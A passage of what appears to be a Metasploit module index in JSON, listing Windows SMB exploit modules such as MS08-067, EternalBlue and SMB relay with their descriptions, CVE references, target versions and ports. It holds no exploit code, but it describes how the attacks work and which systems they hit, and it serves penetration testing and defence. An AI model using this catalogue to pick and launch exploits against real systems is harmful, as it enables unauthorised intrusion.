a stack buffer overflow in the Windows Routing and Remote\n Access Service. Since the service is hosted inside svchost.exe, a failed\n exploit attempt can cause other system services to fail as well. 
A valid\n username and password is required to exploit this flaw on Windows 2000.\n When attacking XP SP1, the SMBPIPE option needs to be set to 'SRVSVC'.", - "references": [ - "CVE-2006-2370", - "OSVDB-26437", - "BID-18325", - "MSB-MS06-025" - ], - "platform": "Windows", - "arch": "", - "rport": 445, - "autofilter_ports": [ - 139, - 445 - ], - "autofilter_services": [ - "netbios-ssn", - "microsoft-ds" - ], - "targets": [ - "Automatic", - "Windows 2000 SP4", - "Windows XP SP1" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/smb/ms06_025_rras.rb", - "is_install_path": true, - "ref_name": "windows/smb/ms06_025_rras", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/smb/ms06_040_netapi": { - "name": "MS06-040 Microsoft Server Service NetpwPathCanonicalize Overflow", - "fullname": "exploit/windows/smb/ms06_040_netapi", - "aliases": [], - "rank": 400, - "disclosure_date": "2006-08-08", - "type": "exploit", - "author": [ - "hdm " - ], - "description": "This module exploits a stack buffer overflow in the NetApi32 CanonicalizePathName() function\n using the NetpwPathCanonicalize RPC call in the Server Service. It is likely that\n other RPC calls could be used to exploit this service. This exploit will result in\n a denial of service on Windows XP SP2 or Windows 2003 SP1. A failed exploit attempt\n will likely result in a complete reboot on Windows 2000 and the termination of all\n SMB-related services on Windows XP. 
The default target for this exploit should succeed\n on Windows NT 4.0, Windows 2000 SP0-SP4+, Windows XP SP0-SP1 and Windows 2003 SP0.", - "references": [ - "CVE-2006-3439", - "OSVDB-27845", - "BID-19409", - "MSB-MS06-040" - ], - "platform": "Windows", - "arch": "", - "rport": 445, - "autofilter_ports": [ - 139, - 445 - ], - "autofilter_services": [ - "netbios-ssn", - "microsoft-ds" - ], - "targets": [ - "(wcscpy) Automatic (NT 4.0, 2000 SP0-SP4, XP SP0-SP1)", - "(wcscpy) Windows NT 4.0 / Windows 2000 SP0-SP4", - "(wcscpy) Windows XP SP0/SP1", - "(stack) Windows XP SP1 English", - "(stack) Windows XP SP1 Italian", - "(wcscpy) Windows 2003 SP0" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/smb/ms06_040_netapi.rb", - "is_install_path": true, - "ref_name": "windows/smb/ms06_040_netapi", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Reliability": [ - "unreliable-session" - ], - "Stability": [ - "crash-os-restarts", - "crash-service-down" - ] - }, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/smb/ms06_066_nwapi": { - "name": "MS06-066 Microsoft Services nwapi32.dll Module Exploit", - "fullname": "exploit/windows/smb/ms06_066_nwapi", - "aliases": [], - "rank": 400, - "disclosure_date": "2006-11-14", - "type": "exploit", - "author": [ - "pusscat " - ], - "description": "This module exploits a stack buffer overflow in the svchost service when the netware\n client service is running. 
This specific vulnerability is in the nwapi32.dll module.", - "references": [ - "CVE-2006-4688", - "OSVDB-30260", - "BID-21023", - "MSB-MS06-066" - ], - "platform": "Windows", - "arch": "", - "rport": 445, - "autofilter_ports": [ - 139, - 445 - ], - "autofilter_services": [ - "netbios-ssn", - "microsoft-ds" - ], - "targets": [ - "Windows XP SP2" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/smb/ms06_066_nwapi.rb", - "is_install_path": true, - "ref_name": "windows/smb/ms06_066_nwapi", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/smb/ms06_066_nwwks": { - "name": "MS06-066 Microsoft Services nwwks.dll Module Exploit", - "fullname": "exploit/windows/smb/ms06_066_nwwks", - "aliases": [], - "rank": 400, - "disclosure_date": "2006-11-14", - "type": "exploit", - "author": [ - "pusscat " - ], - "description": "This module exploits a stack buffer overflow in the svchost service, when the netware\n client service is running. 
This specific vulnerability is in the nwapi32.dll module.", - "references": [ - "CVE-2006-4688", - "OSVDB-30260", - "BID-21023", - "MSB-MS06-066" - ], - "platform": "Windows", - "arch": "", - "rport": 445, - "autofilter_ports": [ - 139, - 445 - ], - "autofilter_services": [ - "netbios-ssn", - "microsoft-ds" - ], - "targets": [ - "Windows XP SP2" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/smb/ms06_066_nwwks.rb", - "is_install_path": true, - "ref_name": "windows/smb/ms06_066_nwwks", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/smb/ms06_070_wkssvc": { - "name": "MS06-070 Microsoft Workstation Service NetpManageIPCConnect Overflow", - "fullname": "exploit/windows/smb/ms06_070_wkssvc", - "aliases": [], - "rank": 0, - "disclosure_date": "2006-11-14", - "type": "exploit", - "author": [ - "jduck " - ], - "description": "This module exploits a stack buffer overflow in the NetApi32 NetpManageIPCConnect\n function using the Workstation service in Windows 2000 SP4 and Windows XP SP2.\n\n In order to exploit this vulnerability, you must specify the name of a\n valid Windows DOMAIN. It may be possible to satisfy this condition by using\n a custom DNS and LDAP setup, however that method is not covered here.\n\n Although Windows XP SP2 is vulnerable, Microsoft reports that Administrator\n credentials are required to reach the vulnerable code. Windows XP SP1 only\n requires valid user credentials. 
Also, testing shows that a machine already\n joined to a domain is not exploitable.", - "references": [ - "CVE-2006-4691", - "OSVDB-30263", - "BID-20985", - "MSB-MS06-070" - ], - "platform": "Windows", - "arch": "", - "rport": 445, - "autofilter_ports": [ - 139, - 445 - ], - "autofilter_services": [ - "netbios-ssn", - "microsoft-ds" - ], - "targets": [ - "Automatic Targetting", - "Windows 2000 SP4", - "Windows XP SP0/SP1" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/smb/ms06_070_wkssvc.rb", - "is_install_path": true, - "ref_name": "windows/smb/ms06_070_wkssvc", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/smb/ms07_029_msdns_zonename": { - "name": "MS07-029 Microsoft DNS RPC Service extractQuotedChar() Overflow (SMB)", - "fullname": "exploit/windows/smb/ms07_029_msdns_zonename", - "aliases": [], - "rank": 0, - "disclosure_date": "2007-04-12", - "type": "exploit", - "author": [ - "hdm ", - "Unknown", - "bcoles " - ], - "description": "This module exploits a stack buffer overflow in the RPC interface\n of the Microsoft DNS service. The vulnerability is triggered\n when a long zone name parameter is supplied that contains\n escaped octal strings. This module is capable of bypassing NX/DEP\n protection on Windows 2003 SP1/SP2. This module exploits the\n RPC service using the \\DNSSERVER pipe available via SMB. 
This\n pipe requires a valid user account to access, so the SMBUSER\n and SMBPASS options must be specified.", - "references": [ - "CVE-2007-1748", - "OSVDB-34100", - "MSB-MS07-029" - ], - "platform": "Windows", - "arch": "", - "rport": 445, - "autofilter_ports": [ - 139, - 445 - ], - "autofilter_services": [ - "netbios-ssn", - "microsoft-ds" - ], - "targets": [ - "Automatic (2000 SP0-SP4, 2003 SP0-SP2)", - "Windows 2000 Server SP0-SP4+ English", - "Windows 2000 Server SP0-SP4+ French", - "Windows 2000 Server SP0-SP4+ German", - "Windows 2000 Server SP0-SP4+ Italian", - "Windows 2000 Server SP0-SP4+ Polish", - "Windows 2000 Server SP0-SP4+ Portuguese", - "Windows 2000 Server SP0-SP4+ Korean", - "Windows 2000 Server SP0-SP4+ Russian", - "Windows 2000 Server SP0-SP4+ Simplified Chinese", - "Windows 2000 Server SP0-SP4+ Spanish", - "Windows 2000 Server SP0-SP4+ Swedish", - "Windows 2000 Server SP0-SP4+ Traditional Chinese", - "Windows 2000 Server SP0-SP4+ Turkish", - "Windows 2003 Server SP0 English", - "Windows 2003 Server SP0 French", - "Windows 2003 Server SP1-SP2 English", - "Windows 2003 Server SP1-SP2 French", - "Windows 2003 Server SP1-SP2 Spanish", - "Windows 2003 Server SP1-SP2 Italian", - "Windows 2003 Server SP1-SP2 German", - "Windows 2003 Server SP1-SP2 Russian", - "Windows 2003 Server SP1-SP2 Simplified Chinese" - ], - "mod_time": "2021-11-30 07:38:08 +0000", - "path": "/modules/exploits/windows/smb/ms07_029_msdns_zonename.rb", - "is_install_path": true, - "ref_name": "windows/smb/ms07_029_msdns_zonename", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/smb/ms08_067_netapi": { - "name": "MS08-067 Microsoft Server Service Relative Path Stack Corruption", - "fullname": "exploit/windows/smb/ms08_067_netapi", - "aliases": [], - "rank": 500, - "disclosure_date": "2008-10-28", - "type": "exploit", - "author": [ - "hdm ", - "Brett Moore ", - "frank2 
", - "jduck " - ], - "description": "This module exploits a parsing flaw in the path canonicalization code of\n NetAPI32.dll through the Server Service. This module is capable of bypassing\n NX on some operating systems and service packs. The correct target must be\n used to prevent the Server Service (along with a dozen others in the same\n process) from crashing. Windows XP targets seem to handle multiple successful\n exploitation events, but 2003 targets will often crash or hang on subsequent\n attempts. This is just the first version of this module, full support for\n NX bypass on 2003, along with other platforms, is still in development.", - "references": [ - "CVE-2008-4250", - "OSVDB-49243", - "MSB-MS08-067", - "URL-https://www.rapid7.com/db/vulnerabilities/dcerpc-ms-netapi-netpathcanonicalize-dos/" - ], - "platform": "Windows", - "arch": "", - "rport": 445, - "autofilter_ports": [ - 139, - 445 - ], - "autofilter_services": [ - "netbios-ssn", - "microsoft-ds" - ], - "targets": [ - "Automatic Targeting", - "Windows 2000 Universal", - "Windows XP SP0/SP1 Universal", - "Windows 2003 SP0 Universal", - "Windows XP SP2 English (AlwaysOn NX)", - "Windows XP SP2 English (NX)", - "Windows XP SP3 English (AlwaysOn NX)", - "Windows XP SP3 English (NX)", - "Windows XP SP2 Arabic (NX)", - "Windows XP SP2 Chinese - Traditional / Taiwan (NX)", - "Windows XP SP2 Chinese - Simplified (NX)", - "Windows XP SP2 Chinese - Traditional (NX)", - "Windows XP SP2 Czech (NX)", - "Windows XP SP2 Danish (NX)", - "Windows XP SP2 German (NX)", - "Windows XP SP2 Greek (NX)", - "Windows XP SP2 Spanish (NX)", - "Windows XP SP2 Finnish (NX)", - "Windows XP SP2 French (NX)", - "Windows XP SP2 Hebrew (NX)", - "Windows XP SP2 Hungarian (NX)", - "Windows XP SP2 Italian (NX)", - "Windows XP SP2 Japanese (NX)", - "Windows XP SP2 Korean (NX)", - "Windows XP SP2 Dutch (NX)", - "Windows XP SP2 Norwegian (NX)", - "Windows XP SP2 Polish (NX)", - "Windows XP SP2 Portuguese - Brazilian (NX)", - "Windows XP 
SP2 Portuguese (NX)", - "Windows XP SP2 Russian (NX)", - "Windows XP SP2 Swedish (NX)", - "Windows XP SP2 Turkish (NX)", - "Windows XP SP3 Arabic (NX)", - "Windows XP SP3 Chinese - Traditional / Taiwan (NX)", - "Windows XP SP3 Chinese - Simplified (NX)", - "Windows XP SP3 Chinese - Traditional (NX)", - "Windows XP SP3 Czech (NX)", - "Windows XP SP3 Danish (NX)", - "Windows XP SP3 German (NX)", - "Windows XP SP3 Greek (NX)", - "Windows XP SP3 Spanish (NX)", - "Windows XP SP3 Finnish (NX)", - "Windows XP SP3 French (NX)", - "Windows XP SP3 Hebrew (NX)", - "Windows XP SP3 Hungarian (NX)", - "Windows XP SP3 Italian (NX)", - "Windows XP SP3 Japanese (NX)", - "Windows XP SP3 Korean (NX)", - "Windows XP SP3 Dutch (NX)", - "Windows XP SP3 Norwegian (NX)", - "Windows XP SP3 Polish (NX)", - "Windows XP SP3 Portuguese - Brazilian (NX)", - "Windows XP SP3 Portuguese (NX)", - "Windows XP SP3 Russian (NX)", - "Windows XP SP3 Swedish (NX)", - "Windows XP SP3 Turkish (NX)", - "Windows 2003 SP1 English (NO NX)", - "Windows 2003 SP1 English (NX)", - "Windows 2003 SP1 Japanese (NO NX)", - "Windows 2003 SP1 Spanish (NO NX)", - "Windows 2003 SP1 Spanish (NX)", - "Windows 2003 SP1 French (NO NX)", - "Windows 2003 SP1 French (NX)", - "Windows 2003 SP2 English (NO NX)", - "Windows 2003 SP2 English (NX)", - "Windows 2003 SP2 German (NO NX)", - "Windows 2003 SP2 German (NX)", - "Windows 2003 SP2 Portuguese (NX)", - "Windows 2003 SP2 Portuguese - Brazilian (NX)", - "Windows 2003 SP2 Spanish (NO NX)", - "Windows 2003 SP2 Spanish (NX)", - "Windows 2003 SP2 Japanese (NO NX)", - "Windows 2003 SP2 French (NO NX)", - "Windows 2003 SP2 French (NX)", - "Windows 2003 SP2 Chinese - Simplified (NX)", - "Windows 2003 SP2 Czech (NX)", - "Windows 2003 SP2 Dutch (NX)", - "Windows 2003 SP2 Hungarian (NX)", - "Windows 2003 SP2 Italian (NX)", - "Windows 2003 SP2 Russian (NX)", - "Windows 2003 SP2 Swedish (NX)", - "Windows 2003 SP2 Turkish (NX)" - ], - "mod_time": "2023-07-10 16:54:42 +0000", - "path": 
"/modules/exploits/windows/smb/ms08_067_netapi.rb", - "is_install_path": true, - "ref_name": "windows/smb/ms08_067_netapi", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/smb/ms09_050_smb2_negotiate_func_index": { - "name": "MS09-050 Microsoft SRV2.SYS SMB Negotiate ProcessID Function Table Dereference", - "fullname": "exploit/windows/smb/ms09_050_smb2_negotiate_func_index", - "aliases": [], - "rank": 400, - "disclosure_date": "2009-09-07", - "type": "exploit", - "author": [ - "Laurent Gaffie ", - "hdm ", - "sf " - ], - "description": "This module exploits an out of bounds function table dereference in the SMB\n request validation code of the SRV2.SYS driver included with Windows Vista, Windows 7\n release candidates (not RTM), and Windows 2008 Server prior to R2. Windows Vista\n without SP1 does not seem affected by this flaw.", - "references": [ - "MSB-MS09-050", - "CVE-2009-3103", - "BID-36299", - "OSVDB-57799", - "URL-https://seclists.org/fulldisclosure/2009/Sep/0039.html" - ], - "platform": "Windows", - "arch": "", - "rport": 445, - "autofilter_ports": [ - 139, - 445 - ], - "autofilter_services": [ - "netbios-ssn", - "microsoft-ds" - ], - "targets": [ - "Windows Vista SP1/SP2 and Server 2008 (x86)" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/smb/ms09_050_smb2_negotiate_func_index.rb", - "is_install_path": true, - "ref_name": "windows/smb/ms09_050_smb2_negotiate_func_index", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/smb/ms10_046_shortcut_icon_dllloader": { - "name": "Microsoft Windows Shell LNK Code Execution", - "fullname": "exploit/windows/smb/ms10_046_shortcut_icon_dllloader", - "aliases": [], - "rank": 600, - "disclosure_date": "2010-07-16", - "type": "exploit", - "author": [ - "hdm ", - 
"jduck ", - "B_H" - ], - "description": "This module exploits a vulnerability in the handling of Windows\n Shortcut files (.LNK) that contain an icon resource pointing to a\n malicious DLL. This creates an SMB resource to provide the payload\n inside a DLL, and generates a LNK file which must be sent to the\n target.", - "references": [ - "CVE-2010-2568", - "OSVDB-66387", - "MSB-MS10-046", - "URL-https://github.com/rapid7/metasploit-framework/pull/4911" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Automatic" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/smb/ms10_046_shortcut_icon_dllloader.rb", - "is_install_path": true, - "ref_name": "windows/smb/ms10_046_shortcut_icon_dllloader", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/smb/ms10_061_spoolss": { - "name": "MS10-061 Microsoft Print Spooler Service Impersonation Vulnerability", - "fullname": "exploit/windows/smb/ms10_061_spoolss", - "aliases": [], - "rank": 600, - "disclosure_date": "2010-09-14", - "type": "exploit", - "author": [ - "jduck ", - "hdm " - ], - "description": "This module exploits the RPC service impersonation vulnerability detailed in\n Microsoft Bulletin MS10-061. By making a specific DCE RPC request to the\n StartDocPrinter procedure, an attacker can impersonate the Printer Spooler service\n to create a file. The working directory at the time is %SystemRoot%\\system32.\n An attacker can specify any file name, including directory traversal or full paths.\n By sending WritePrinter requests, an attacker can fully control the content of\n the created file.\n\n In order to gain code execution, this module writes to a directory used by Windows\n Management Instrumentation (WMI) to deploy applications. 
This directory (Wbem\\Mof)\n is periodically scanned and any new .mof files are processed automatically. This is\n the same technique employed by the Stuxnet code found in the wild.", - "references": [ - "OSVDB-67988", - "CVE-2010-2729", - "MSB-MS10-061" - ], - "platform": "Windows", - "arch": "", - "rport": 445, - "autofilter_ports": [ - 139, - 445 - ], - "autofilter_services": [ - "netbios-ssn", - "microsoft-ds" - ], - "targets": [ - "Windows Universal" - ], - "mod_time": "2025-04-04 11:55:57 +0000", - "path": "/modules/exploits/windows/smb/ms10_061_spoolss.rb", - "is_install_path": true, - "ref_name": "windows/smb/ms10_061_spoolss", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "SideEffects": [ - "artifacts-on-disk" - ], - "Reliability": [] - }, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/smb/ms15_020_shortcut_icon_dllloader": { - "name": "Microsoft Windows Shell LNK Code Execution", - "fullname": "exploit/windows/smb/ms15_020_shortcut_icon_dllloader", - "aliases": [], - "rank": 600, - "disclosure_date": "2015-03-10", - "type": "exploit", - "author": [ - "Michael Heerklotz", - "juan vazquez " - ], - "description": "This module exploits a vulnerability in the MS10-046 patch to abuse (again) the handling\n of Windows Shortcut files (.LNK) that contain an icon resource pointing to a malicious\n DLL. This creates an SMB resource to provide the payload and the trigger, and generates a\n LNK file which must be sent to the target. 
This module has been tested successfully on\n Windows 2003 SP2 with MS10-046 installed and Windows 2008 SP2 (32 bits) with MS14-027\n installed.", - "references": [ - "CVE-2015-0096", - "MSB-MS15-020", - "URL-http://h30499.www3.hp.com/t5/HP-Security-Research-Blog/Full-details-on-CVE-2015-0096-and-the-failed-MS10-046-Stuxnet/ba-p/6718459#.VQBOymTF9so", - "URL-https://github.com/rapid7/metasploit-framework/pull/4911" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Automatic" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/smb/ms15_020_shortcut_icon_dllloader.rb", - "is_install_path": true, - "ref_name": "windows/smb/ms15_020_shortcut_icon_dllloader", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/smb/ms17_010_eternalblue": { - "name": "MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption", - "fullname": "exploit/windows/smb/ms17_010_eternalblue", - "aliases": [ - "exploit/windows/smb/ms17_010_eternalblue_win8" - ], - "rank": 200, - "disclosure_date": "2017-03-14", - "type": "exploit", - "author": [ - "Equation Group", - "Shadow Brokers", - "sleepya", - "Sean Dillon ", - "Dylan Davis ", - "thelightcosine", - "wvu ", - "agalway-r7", - "cdelafuente-r7", - "cdelafuente-r7", - "agalway-r7" - ], - "description": "This module is a port of the Equation Group ETERNALBLUE exploit, part of\n the FuzzBunch toolkit released by Shadow Brokers.\n\n There is a buffer overflow memmove operation in Srv!SrvOs2FeaToNt. The size\n is calculated in Srv!SrvOs2FeaListSizeToNt, with mathematical error where a\n DWORD is subtracted into a WORD. The kernel pool is groomed so that overflow\n is well laid-out to overwrite an SMBv1 buffer. 
Actual RIP hijack is later\n completed in srvnet!SrvNetWskReceiveComplete.\n\n This exploit, like the original may not trigger 100% of the time, and should be\n run continuously until triggered. It seems like the pool will get hot streaks\n and need a cool down period before the shells rain in again.\n\n The module will attempt to use Anonymous login, by default, to authenticate to perform the\n exploit. If the user supplies credentials in the SMBUser, SMBPass, and SMBDomain options it will use\n those instead.\n\n On some systems, this module may cause system instability and crashes, such as a BSOD or\n a reboot. This may be more likely with some payloads.", - "references": [ - "MSB-MS17-010", - "CVE-2017-0143", - "CVE-2017-0144", - "CVE-2017-0145", - "CVE-2017-0146", - "CVE-2017-0147", - "CVE-2017-0148", - "URL-https://github.com/RiskSense-Ops/MS17-010", - "URL-https://risksense.com/wp-content/uploads/2018/05/White-Paper_Eternal-Blue.pdf", - "EDB-42030" - ], - "platform": "Windows", - "arch": "x64", - "rport": 445, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Automatic Target", - "Windows 7", - "Windows Embedded Standard 7", - "Windows Server 2008 R2", - "Windows 8", - "Windows 8.1", - "Windows Server 2012", - "Windows 10 Pro", - "Windows 10 Enterprise Evaluation" - ], - "mod_time": "2023-07-14 12:46:26 +0000", - "path": "/modules/exploits/windows/smb/ms17_010_eternalblue.rb", - "is_install_path": true, - "ref_name": "windows/smb/ms17_010_eternalblue", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": { - "AKA": [ - "ETERNALBLUE" - ] - }, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/smb/ms17_010_psexec": { - "name": "MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Code Execution", - "fullname": "exploit/windows/smb/ms17_010_psexec", - "aliases": [], - "rank": 300, - "disclosure_date": "2017-03-14", - "type": "exploit", - "author": [ - "sleepya", - 
"zerosum0x0", - "Shadow Brokers", - "Equation Group" - ], - "description": "This module will exploit SMB with vulnerabilities in MS17-010 to achieve a write-what-where\n primitive. This will then be used to overwrite the connection session information with as an\n Administrator session. From there, the normal psexec payload code execution is done.\n\n Exploits a type confusion between Transaction and WriteAndX requests and a race condition in\n Transaction requests, as seen in the EternalRomance, EternalChampion, and EternalSynergy\n exploits. This exploit chain is more reliable than the EternalBlue exploit, but requires a\n named pipe.", - "references": [ - "MSB-MS17-010", - "CVE-2017-0143", - "CVE-2017-0146", - "CVE-2017-0147", - "URL-https://github.com/worawit/MS17-010", - "URL-https://hitcon.org/2017/CMT/slide-files/d2_s2_r0.pdf", - "URL-https://blogs.technet.microsoft.com/srd/2017/06/29/eternal-champion-exploit-analysis/" - ], - "platform": "Windows", - "arch": "x86, x64", - "rport": 445, - "autofilter_ports": [ - 139, - 445 - ], - "autofilter_services": [ - "netbios-ssn", - "microsoft-ds" - ], - "targets": [ - "Automatic", - "PowerShell", - "Native upload", - "MOF upload" - ], - "mod_time": "2021-06-03 11:43:09 +0000", - "path": "/modules/exploits/windows/smb/ms17_010_psexec.rb", - "is_install_path": true, - "ref_name": "windows/smb/ms17_010_psexec", - "check": true, - "post_auth": true, - "default_credential": false, - "notes": { - "AKA": [ - "ETERNALSYNERGY", - "ETERNALROMANCE", - "ETERNALCHAMPION", - "ETERNALBLUE" - ] - }, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/smb/netidentity_xtierrpcpipe": { - "name": "Novell NetIdentity Agent XTIERRPCPIPE Named Pipe Buffer Overflow", - "fullname": "exploit/windows/smb/netidentity_xtierrpcpipe", - "aliases": [], - "rank": 500, - "disclosure_date": "2009-04-06", - "type": "exploit", - "author": [ - "MC ", - "Ruben Santamarta" - ], - "description": "This module exploits a stack buffer 
overflow in Novell's NetIdentity Agent. When sending\n a specially crafted string to the 'XTIERRPCPIPE' named pipe, an attacker may be\n able to execute arbitrary code. The success of this module is much greater once the\n service has been restarted.", - "references": [ - "CVE-2009-1350", - "OSVDB-53351", - "BID-34400", - "URL-http://www.reversemode.com/index.php?option=com_content&task=view&id=62&Itemid=1" - ], - "platform": "Windows", - "arch": "", - "rport": 445, - "autofilter_ports": [ - 139, - 445 - ], - "autofilter_services": [ - "netbios-ssn", - "microsoft-ds" - ], - "targets": [ - "Windows 2000 / Windows XP / Windows 2003" - ], - "mod_time": "2022-08-08 01:40:15 +0000", - "path": "/modules/exploits/windows/smb/netidentity_xtierrpcpipe.rb", - "is_install_path": true, - "ref_name": "windows/smb/netidentity_xtierrpcpipe", - "check": false, - "post_auth": true, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/smb/psexec": { - "name": "Microsoft Windows Authenticated User Code Execution", - "fullname": "exploit/windows/smb/psexec", - "aliases": [], - "rank": 0, - "disclosure_date": "1999-01-01", - "type": "exploit", - "author": [ - "hdm ", - "Royce Davis ", - "RageLtMan " - ], - "description": "This module uses a valid administrator username and password (or\n password hash) to execute an arbitrary payload. This module is similar\n to the \"psexec\" utility provided by SysInternals. This module is now able\n to clean up after itself. 
The service created by this tool uses a randomly\n chosen name and description.", - "references": [ - "CVE-1999-0504", - "OSVDB-3106", - "URL-http://technet.microsoft.com/en-us/sysinternals/bb897553.aspx", - "URL-https://www.optiv.com/blog/owning-computers-without-shell-access", - "URL-http://sourceforge.net/projects/smbexec/" - ], - "platform": "Windows", - "arch": "", - "rport": 445, - "autofilter_ports": [ - 139, - 445 - ], - "autofilter_services": [ - "netbios-ssn", - "microsoft-ds" - ], - "targets": [ - "Automatic", - "PowerShell", - "Native upload", - "MOF upload", - "Command" - ], - "mod_time": "2024-12-16 14:55:10 +0000", - "path": "/modules/exploits/windows/smb/psexec.rb", - "is_install_path": true, - "ref_name": "windows/smb/psexec", - "check": false, - "post_auth": true, - "default_credential": false, - "notes": {}, - "session_types": [ - "smb" - ], - "needs_cleanup": null, - "actions": [] - }, - "exploit_windows/smb/smb_delivery": { - "name": "SMB Delivery", - "fullname": "exploit/windows/smb/smb_delivery", - "aliases": [], - "rank": 600, - "disclosure_date": "2016-07-26", - "type": "exploit", - "author": [ - "Andrew Smith", - "Russel Van Tuyl" - ], - "description": "This module serves payloads via an SMB server and provides commands to retrieve\n and execute the generated payloads. 
Currently supports DLLs and Powershell.", - "references": [ - "URL-https://github.com/rapid7/metasploit-framework/pull/3074" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "DLL", - "PSH" - ], - "mod_time": "2022-05-11 12:40:43 +0000", - "path": "/modules/exploits/windows/smb/smb_delivery.rb", - "is_install_path": true, - "ref_name": "windows/smb/smb_delivery", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/smb/smb_doublepulsar_rce": { - "name": "SMB DOUBLEPULSAR Remote Code Execution", - "fullname": "exploit/windows/smb/smb_doublepulsar_rce", - "aliases": [ - "exploit/windows/smb/doublepulsar_rce" - ], - "rank": 500, - "disclosure_date": "2017-04-14", - "type": "exploit", - "author": [ - "Equation Group", - "Shadow Brokers", - "zerosum0x0", - "Luke Jennings", - "wvu ", - "Jacob Robles" - ], - "description": "This module executes a Metasploit payload against the Equation Group's\n DOUBLEPULSAR implant for SMB as popularly deployed by ETERNALBLUE.\n\n While this module primarily performs code execution against the implant,\n the \"Neutralize implant\" target allows you to disable the implant.", - "references": [ - "MSB-MS17-010", - "CVE-2017-0143", - "CVE-2017-0144", - "CVE-2017-0145", - "CVE-2017-0146", - "CVE-2017-0147", - "CVE-2017-0148", - "URL-https://zerosum0x0.blogspot.com/2017/04/doublepulsar-initial-smb-backdoor-ring.html", - "URL-https://countercept.com/blog/analyzing-the-doublepulsar-kernel-dll-injection-technique/", - "URL-https://www.countercept.com/blog/doublepulsar-usermode-analysis-generic-reflective-dll-loader/", - "URL-https://github.com/countercept/doublepulsar-detection-script", - "URL-https://github.com/countercept/doublepulsar-c2-traffic-decryptor", - "URL-https://gist.github.com/msuiche/50a36710ee59709d8c76fa50fc987be1" - ], - "platform": "Windows", 
- "arch": "x64", - "rport": 445, - "autofilter_ports": [ - 139, - 445 - ], - "autofilter_services": [ - "netbios-ssn", - "microsoft-ds" - ], - "targets": [ - "Execute payload (x64)", - "Neutralize implant" - ], - "mod_time": "2023-09-15 16:40:22 +0000", - "path": "/modules/exploits/windows/smb/smb_doublepulsar_rce.rb", - "is_install_path": true, - "ref_name": "windows/smb/smb_doublepulsar_rce", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": { - "AKA": [ - "DOUBLEPULSAR" - ], - "RelatedModules": [ - "auxiliary/scanner/smb/smb_ms17_010", - "exploit/windows/smb/ms17_010_eternalblue" - ], - "Stability": [ - "crash-os-down" - ], - "Reliability": [ - "repeatable-session" - ], - "SideEffects": [] - }, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/smb/smb_relay": { - "name": "MS08-068 Microsoft Windows SMB Relay Code Execution", - "fullname": "exploit/windows/smb/smb_relay", - "aliases": [], - "rank": 600, - "disclosure_date": "2001-03-31", - "type": "exploit", - "author": [ - "hdm ", - "juan vazquez ", - "agalway-r7", - "alanfoster", - "Spencer McIntyre" - ], - "description": "This module will relay SMB authentication requests to another\n host, gaining access to an authenticated SMB session if successful.\n If the connecting user is an administrator and network logins are\n allowed to the target machine, this module will execute an arbitrary\n payload. To exploit this, the target system\tmust try to\tauthenticate\n to this module. The easiest way to force a SMB authentication attempt\n is by embedding a UNC path (\\SERVER\\SHARE) into a web page or\n email message. When the victim views the web page or email, their\n system will automatically connect to the server specified in the UNC\n share (the IP address of the system running this module) and attempt\n to authenticate. Unfortunately, this\n module is not able to clean up after itself. 
